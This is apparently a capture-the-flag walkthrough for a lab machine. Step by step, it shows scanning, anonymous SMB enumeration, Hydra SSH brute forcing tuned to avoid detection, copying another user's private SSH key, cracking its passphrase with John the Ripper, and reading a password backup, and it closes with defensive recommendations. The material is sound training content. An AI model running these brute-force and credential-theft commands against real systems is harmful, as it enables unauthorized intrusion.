Basic Pentesting Walkthrough

Network Scanning

Objective: Discover open ports and running services on the target machine.

Start with a comprehensive SYN scan using Nmap:

sudo nmap -sS <TARGET_IP>

For more detailed information, use:

sudo nmap -sC -sV -oN detailed_scan.txt <TARGET_IP>

The scan reveals the following open ports:

• Port 22 (SSH): OpenSSH service
• Port 80 (HTTP): Apache web server
• Port 139 (NetBIOS-SSN): NetBIOS Session Service
• Port 445 (Microsoft-DS): SMB/CIFS service
• Port 8009 (AJP13): Apache JServ Protocol
• Port 8080 (HTTP-Proxy): Alternative HTTP service

Key Learnings:

Multiple services provide various attack vectors. SMB services (ports 139/445) are particularly interesting for information gathering, while SSH and HTTP services offer potential entry points.

Web Directory Enumeration

Objective: Discover hidden directories and files on the web server.

Use Gobuster to enumerate web directories:

gobuster dir -u http://<TARGET_IP> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Key discovery:

• /development/ - Development directory with status 301 redirect

Development Directory Analysis:

Navigate to http://<TARGET_IP>/development/ to find development logs and notes.

Key information discovered:

• System running version 2.5.12
• SMB service confirmed
• Apache web server details
• Note that "J has a weak password" - indicating a user with poor password security

Key Learnings:

Development directories often contain valuable reconnaissance information including system details, version numbers, and security notes that can guide further attacks.

SMB Share Discovery

Objective: Enumerate SMB shares and identify accessible resources.

Use smbmap to discover available shares with anonymous access:

smbmap -H <TARGET_IP> -u '' -p ''

Results show:

• Anonymous: READ ONLY access available
• IPC$: NO ACCESS (IPC Service for Samba Server 4.15.13-Ubuntu)

Alternative SMB enumeration methods:

# Using enum4linux
enum4linux <TARGET_IP>

# Using smbclient to list shares
smbclient -L //<TARGET_IP> -U '' -N

Key Learnings:

Anonymous SMB access is a common misconfiguration that can lead to information disclosure. Always test for null session access first.

Anonymous SMB Access

Objective: Access the Anonymous share and extract sensitive information.

Connect to the Anonymous share using smbclient:

smbclient //<TARGET_IP>/Anonymous -U '' -p ''

When prompted for a password, simply press Enter (leave blank).

SMB Session Commands:

smb: \> ls

Files discovered:

• staff.txt - Contains staff information (173 bytes)

Download the file:

smb: \> get staff.txt

Exit SMB session and examine the file:

smb: \> exit
cat staff.txt

Staff.txt Contents Reveal:

Based on the development logs mentioning "J has a weak password" and finding user "Jan", this creates a clear target for password attacks.

Key Learnings:

SMB shares often contain organizational information like staff lists, which provide usernames for targeted authentication attacks.

Password Brute Force with Hydra

Objective: Exploit Jan's weak password using automated brute force techniques.

Use Hydra to brute force Jan's SSH password:

hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://<TARGET_IP>

Alternative Hydra syntax:

# If using compressed wordlist
hydra -l jan -P /usr/share/wordlists/rockyou.txt.gz ssh://<TARGET_IP>

# With verbose output
hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://<TARGET_IP> -v

# Limiting threads to avoid detection
hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://<TARGET_IP> -t 4

Hydra successfully discovers Jan's password:

SSH Access Verification:

ssh jan@<TARGET_IP>

Enter password: armando

Key Learnings:

Weak passwords are easily cracked using common wordlists. The rockyou.txt wordlist contains millions of real-world passwords from data breaches, making it highly effective against weak passwords.

Initial System Access

Objective: Establish foothold and perform initial reconnaissance as Jan.

Once connected via SSH, perform basic system enumeration:

# Check current user and privileges
whoami
id

# List home directory contents
ls -la /home/

# Check for other users
cat /etc/passwd | grep -E '/bin/bash|/bin/sh'

Key discoveries:

• Current user: jan
• Other user confirmed: kay
• Standard user privileges (no immediate sudo access)

Key Learnings:

Initial access often reveals additional users and system information that guide further enumeration and lateral movement attempts.

SUID Binary Enumeration

Objective: Search for privilege escalation vectors through SUID binaries.

Search for SUID binaries:

find / -perm -4000 2>/dev/null

After testing various potential exploits without success, pivot to user enumeration and file discovery.

Key Learnings:

Not all SUID binaries are exploitable. When direct privilege escalation fails, focus on lateral movement and credential discovery.

SSH Key Discovery

Objective: Locate SSH private keys for lateral movement to other users.

Explore Kay's home directory for SSH keys:

# Search for SSH keys in Kay's directory
find /home/kay -name "id_rsa" 2>/dev/null
find /home/kay -name "*.key" 2>/dev/null

# Check the .ssh directory specifically
ls -la /home/kay/.ssh/

Discovery: SSH private key found in Kay's .ssh directory

Copy SSH Key to Your Machine:

# On the target (as Jan)
cat /home/kay/.ssh/id_rsa

# Copy the entire key content to your local machine
# Save as 'kay_id_rsa' locally

Set proper permissions on your local machine:

chmod 600 kay_id_rsa

Test SSH Key Access:

ssh -i kay_id_rsa kay@<TARGET_IP>

Result: SSH key is password protected, requiring passphrase cracking.

Key Learnings:

SSH private keys are often stored with weak or no passphrases. Even when protected, they can be cracked using dictionary attacks.

SSH Key Passphrase Cracking

Objective: Crack the SSH private key passphrase using John the Ripper.

Convert SSH key to John the Ripper format:

ssh2john kay_id_rsa > kay_id_rsa_hash.txt

Prepare Wordlist (if compressed):

# If rockyou.txt is compressed (common in Kali Linux)
sudo gunzip /usr/share/wordlists/rockyou.txt.gz

Crack the SSH Key:

sudo john --wordlist=/usr/share/wordlists/rockyou.txt kay_id_rsa_hash.txt

Alternative with specific format:

john --format=SSH --wordlist=/usr/share/wordlists/rockyou.txt kay_id_rsa_hash.txt

John the Ripper successfully cracks the passphrase:

Access Kay's Account:

ssh -i kay_id_rsa kay@<TARGET_IP>

Enter passphrase when prompted: beeswax

Key Learnings:

SSH private keys with weak passphrases are vulnerable to dictionary attacks. John the Ripper's ssh2john utility makes this process straightforward.

Kay's Home Directory Exploration

Objective: Locate sensitive files and potential flags in Kay's account.

Once logged in as Kay, explore the home directory:

# List all files including hidden ones
ls -la

# Check for backup files
ls -la *.bak
find . -name "*.bak" 2>/dev/null

Discovery: pass.bak file contains sensitive information

Extract Final Flag:

cat pass.bak

Additional Enumeration:

While you have Kay's access, perform additional reconnaissance:

# Check sudo privileges
sudo -l

# Look for additional sensitive files
find /home/kay -type f -name "*.txt" -o -name "*.conf" -o -name "*.log"

# Check for cron jobs
crontab -l
ls -la /etc/cron*

Key Learnings:

Backup files (.bak) often contain sensitive information including passwords, configuration data, and flags. Always check for backup files during enumeration.

Complete Attack Chain

Full Penetration Testing Methodology:

1. Reconnaissance: Nmap scan revealed multiple services
2. Information Gathering: Web directory enumeration found development notes
3. SMB Enumeration: Anonymous access revealed staff usernames
4. Credential Attack: Brute forced SSH password for user Jan
5. Lateral Movement: Discovered Kay's SSH private key
6. Credential Cracking: Cracked SSH key passphrase
7. Flag Extraction: Found final flag in backup file

Technical Skills Demonstrated:

• Network reconnaissance with Nmap
• Web directory enumeration using Gobuster
• SMB service enumeration and exploitation
• SSH password brute forcing with Hydra
• SSH private key discovery and extraction
• Passphrase cracking with John the Ripper
• File system enumeration and sensitive data discovery

Tools and Techniques Used:

• Nmap: Network and service discovery
• Gobuster: Web directory enumeration
• smbmap/smbclient: SMB share enumeration and access
• Hydra: SSH password brute forcing
• ssh2john: SSH key format conversion
• John the Ripper: Password and passphrase cracking
• Linux commands: System enumeration and file discovery

Vulnerabilities Identified:

• Information Disclosure: Development notes revealing system details
• SMB Misconfiguration: Anonymous read access to sensitive files
• Weak Passwords: Easily guessable SSH credentials
• SSH Key Security: Weak passphrase protection
• File Permissions: Accessible backup files containing sensitive data

Defensive Recommendations:

• Remove or secure development directories from production systems
• Disable anonymous SMB access and implement proper access controls
• Enforce strong password policies and regular password changes
• Use strong passphrases for SSH private keys
• Implement proper file permissions and avoid storing sensitive data in backup files
• Regular security audits and penetration testing
• Network segmentation and access controls

Real-World Applications:

This challenge demonstrates a typical penetration testing engagement where:

• Multiple attack vectors are explored systematically
• Information gathered in early phases guides later attacks
• Lateral movement is necessary to achieve objectives
• Common misconfigurations provide attack opportunities
• Weak credentials remain a primary attack vector